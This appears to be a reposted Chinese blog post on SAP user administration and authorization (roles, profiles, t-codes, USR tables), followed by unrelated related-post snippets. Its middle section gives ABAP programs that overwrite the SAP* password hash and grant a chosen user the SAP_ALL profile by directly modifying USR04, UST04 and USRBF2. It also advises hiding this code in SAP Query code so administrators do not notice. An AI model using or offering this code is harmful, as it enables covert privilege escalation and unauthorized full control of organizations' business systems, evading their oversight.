2. 程式人生 > >SAP 的使用者建立及許可權設定

SAP 的使用者建立及許可權設定

阿新 發佈:2019-01-31
通常basis會使用PFCG做許可權管理,時你儲存時會產生一個系統外的profile name,
記得SU01時使用者有profile 和role兩欄位嗎?它們的關係如何呢?

首先明白幾個概念.
1.activity
這樣說吧,我們從activity談起,activity是什麼意思這個你查下
字典也就知道了,對就是規定可做什麼動作,比如說不能吸菸只能喝酒,不能多於2兩,
不對,這是我老婆講的,SAP不是這樣子的,是隻能insert, update,display什麼的.
這些東西當年德國佬是寫在tobj表中的.
activity 也是可分activity group的.

2.activity category &Authorization group
Role Vs Profile
你看看錶T020就知道了,就是什麼K,D, A, M什麼的.

profile是什麼呢?實際上可以理解為所有的authorization data(有很多authorization group--{你可使用OBA7填寫,許可權太細也不是好事^_^}和activity組成)的一個集合的名字,通常一個自定義的role產
生一個profile,SAP許可權控制是根據profile裡的authorization data(objects)來控制的.

role又是什麼呢?role只是一個名字而已,然後將profile賦予給它, 比如你SU01建立一個
使用者,我沒有任何role,但是加如SAP_All profile也是可做任何事情.
SAP本身有很多default role & profile.

3.最常用的PFCG->authorizations->change authorization data->
進入後選取selection criteria 可看到所有的authorization object
manually可手工加authorization object,比如你使用某個t-code許可權出錯誤,abap使用SU53檢查就
知道缺少哪個authorization objec,然後手工加入就可以.
你選去authorization levels就可by account type再細分許可權.
有些甚至直接到表字段.而且你甚至可給一個object分配快取buffer.
那麼SAP是如何做到許可權控制的呢,屠夫就用刀小宰一下.
4.關於許可權方面的幾個t-code.
(一)Role(角色)相關T-code:
PFAC         標準
PFAC_CHG 改變
PFAC_DEL 刪除
PFAC_DIS 顯示
PFAC_INS 新建
PFAC_STR
PFCG 建立
ROLE_CMP 比較
SUPC 批量建立角色profile
SWUJ 測試
SU03            檢測authorzation data
SU25, SU26      檢查updated profile
(二)建立使用者相關T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 批量
SU12 批量
SUCOMP:維護使用者公司地址
SU2 change使用者引數
SUIM 使用者資訊系統
使用者組
SUGR:維護
SUGRD:顯示
SUGRD_NAV:還是維護
SUGR_NAV:還是顯示

(三)關於profile&Authoraztion Data
SU02:直接建立profile不用role
SU20:細分Authorization Fields

SU21(SU03):****維護Authorization Objects(TOBJ,USR12).
對於憑證你可細分到:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
然後你進去還可細分,這些個東西是save在USR12表中的. 在DB層是UTAB.

對具體transaction code細分:    
SU22,SU24
SU53:*** 就是你出錯用來檢查沒有那些authoraztion objects.
SU56:分析authoraztion data buffers.
SU87:用來檢查使用者改變產生的history
SU96,SU97,SU98,SU99:幹啥的?
SUPC:批量產生role

DB和logical層:
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(全在此)
USR12: 使用者級authoraztion值
-----------------------------
USR01:主資料
USR02:密碼在此
USR04:授權在此
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:當前使用者
USREFUS:
USRBF2
USRBF3
UST04:User Profile在此
UST10C: Composite profiles
UST10S: Single profiles (角色對應的
UST12 : Authorizations..............................

..............................
如何竊取許可權

..............................


使用者:
User type使用者型別(幹啥用的不講):
通常的使用者型別有
a.dialog (就是normal user)
b.communication
c.system
d.service
e.reference.

通常你在使用任何T-code前一定會有許可權檢測的.
AUTHORITY_CHECK:這個函式只是小檢查一下你的user有沒有,什麼時候過期.
**如果coding只要使用此函式就夠了.
AUTHORITY_CHECK_TCODE:檢查T-code

這倆函式是真正檢查autorization objects的.
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
將SAP*的密碼改成123的程式,很簡單.
我們找到那個user logon表USR02.
(DF52478E6FF90EEB是經過SAP加密儲存在DB的,哪位老兄研究過SAP的密碼加密?)
report zmodSAP*.
data zUSR02 like USR02 .
select single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02 .

現在的問題是如何讓你那basis不發現,很簡單,將code隱藏在Query裡面,就是說你做一個
query,query是會產生code的,然後你加入此程式碼,誰能想到???然後你就等你的basis去哭...

這樣做太狠毒了.還是自己偷偷搞自己的使用者吧.
在此你必須對許可權結構非常清晰.
許可權和三個表有關係.
a.USR04
b.USR04
c.USRBF2 這個表是對應到所用的authorzization objects的.
*&---------------------------------------------------------------------*
*& Report        : Steal SAP ALL Right                                 *
*& Creation Date : 2004.04.01                                          *
*& Created by    : Stone.Fu                                            *
*& Description   : 可竊取SAP ALL許可權                                     *
*& Modified Date : 2005.11.02
*& Description   : 將此code hide在report painter or query code        *
*&---------------------------------------------------------------------*

report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 許可權
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS = zPROFS.
Update USR04 from zUSR04 .

**Update User authorization masters table UST04 .
select single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE = 'SAP_ALL'. "SAP all 許可權
Update UST04 from zUST04 .

*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .

select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

自己建立一個ztest使用者不給它任何許可權然後在test machine上run 報表zrightsteal.

然後ztest就是SAP_ALL了, 然後你將code hide在SQP query的code中. ABAP code太容易被人發現.

相關推薦

SAP 的使用者建立許可權設定

通常basis會使用PFCG做許可權管理,時你儲存時會產生一個系統外的profile name, 記得SU01時使用者有profile 和role兩欄位嗎?它們的關係如何呢? 首先明白幾個概念. 1.activity 這樣說吧,我們從activity談起,activity

[轉載]Oracle使用者建立許可權設定

出處:https://www.cnblogs.com/buxingzhelyd/p/7865194.html   許可權:   create session  允許使用者登入資料庫許可權   create table   允許使用者建立表許可權   unlim

Oracle使用者建立許可權設定

許可權:   create session  允許使用者登入資料庫許可權   create table   允許使用者建立表許可權   unlimited tablespace  允許使用者在其他表空間隨意建表 角色:   connect     resour

使用O2OA二次開發搭建企業辦公平臺(十六)資訊開發篇:資訊欄目和分類的建立許可權設定

本部落格為O2OA系列教程、O2OA使用手冊,教程目錄和各章節天梯將在連載完後更新。 使用O2OA二次開發搭建企業辦公平臺(一)平臺部署篇:平臺下載和部署 使用O2OA二次開發搭建企業辦公平臺(二)平臺部署篇:埠衝突和伺服器埠配置 使用O2OA二次開發搭建企業辦公平臺(三)平臺部署篇:使用外部資料庫

Mongo 使用者建立許可權管理

Mongo版本3.0之前使用的是db.addUser(),但3.0之後使用的是db.createUser() 內建的角色:  資料庫使用者角色:read、readWrite;  資料庫管理角色:d

mongodb使用者建立許可權控制

> use admin switched to db admin > db.auth('dba','dba') 1 > db.system.users.find().pretty() { "_id" : "admin.dba", "user" : "dba",

SVN鉤子許可權設定

post-commit-run.bat --------------------------------------------- @echo off SET REPOS=%1 SET USER=%2 SET SVN="D:/Program Files/Subversion

MySQL8初始化、賬戶建立許可權分配

1、MySQL8沒有初始的data目錄,需要在使用前進行初始化。 基本配置檔案 my.cnf [mysqld] basedir = D:\mysql datadir = D:\mysql\data port = 3336 character-set-server =

RabbitMQ使用教程(二)RabbitMQ使用者管理,角色管理許可權設定

上一篇部落格 RabbitMQ使用教程(一)RabbitMQ環境安裝配置及Hello World示例 中,我們成功的安裝好了RabbitMQ環境,並通過一個Java客戶端示例瞭解了用生產者來發布訊息,用消費者來消費訊息。 本篇部落格主要講解下RabbitMQ如何管理使用者(新增/刪除/修改密碼),如何給使用者

從0開始,手把手教你用Vue開發一個答題App01之專案建立答題設定頁面開發

## 專案演示 [專案演示](https://kamiba.gitee.io/vue-quiz-app-show-version/) ## 專案原始碼 [專案原始碼](https://gitee.com/kamiba/vue-quiz) ## 配套講解視訊 [配套講解視訊](https://www.bi

SAP系統許可權管理引數設定

SAP系統的許可權管理主要是通過事務程式碼,許可權物件,許可權等3個關鍵物件構築的. 1. 事務程式碼(Tcode) SAP系統中,每個操作命令都是唯一對應一個事務程式碼.事務程式碼是操作命令的表現形式.使用者通過輸入相應的事務程式碼

linux系統下ubuntu重啟apache服務命令檔案許可權設定

常用修改許可權的命令: sudo chmod 600 ××× (只有所有者有讀和寫的許可權) sudo chmod 644 ××× (所有者有讀和寫的許可權,組使用者只有讀的許可權) sudo chmod 700 ××× (只有所有者有讀和寫以及執行的許可權) sudo chmod

Linux建立ftp並設定許可權以及忘記ftp帳號(密碼)修改

Linux建立ftp並設定許可權以及忘記ftp帳號(密碼)修改 忘記ftp密碼修改方法:1.登入伺服器 cd  /etc/vsftpdcat ftpusers找到對應的ftp使用者名稱 (如果使用者名稱也忘記了 那麼 cd /etc 然

mysql建立使用者並設定所有許可權

mysql建立使用者並設定所有許可權1、建立使用者:CREATE USER 'username'@'host' IDENTIFIED BY 'password';username:使用者名稱; host:指定在哪個主機上可以登入,本機可用localhost,%通配所有遠端主機; password

Linux建立ftp並設定許可權以及忘記ftp帳號(密碼)修改 (轉)

  忘記ftp密碼修改方法:1.登入伺服器 cd  /etc/vsftpdcat ftpusers找到對應的ftp使用者名稱 (如果使用者名稱也忘記了 那麼 cd /etc 然後cat pas

MySQL 建立使用者許可權的操作命令

建立新使用者 CREATE USER 'newuser'@'localhost' IDENTIFIED BY 'password'; 賦予操作許可權: GRANT ALL PRIVILEGES ON database_name.table_name TO ‘username

Lunix上Mysql,伺服器上的使用者ip許可權設定

    1.linux下啟動mysql的命令:   mysqladmin start   /ect/init.d/mysql start (前面為mysql的安裝路徑)   2.linux下重啟mysql的命令:   mysqladmin restart   /

Linux特殊許可權設定ACL許可權

SUID、SGID和sticky-bit 檔案特殊許可權 特殊許可權 說明 SUID 當一個設定了SUID的檔案被執行時,該檔案將以其所有者的身份執行,而不是執行者的許可權。

[小技巧]open()函式建立檔案時便捷的許可權設定

[小技巧]open()函式建立檔案時便捷的許可權設定 2016年07月18日 17:14:12 嵐漾憶雨 閱讀數:3404更多 個人分類: LinuxC程式設計 版權宣告:本文為博主原創文章,未經博主允許不得轉載。 https://blog.csdn.net

oracle使用者建立、授權和許可權設定(關於Oracle許可權2)

許可權: create session create table unlimited tablespace connect resource dba 例: #sqlplus /nolog SQL> conn / as sysdba; SQL>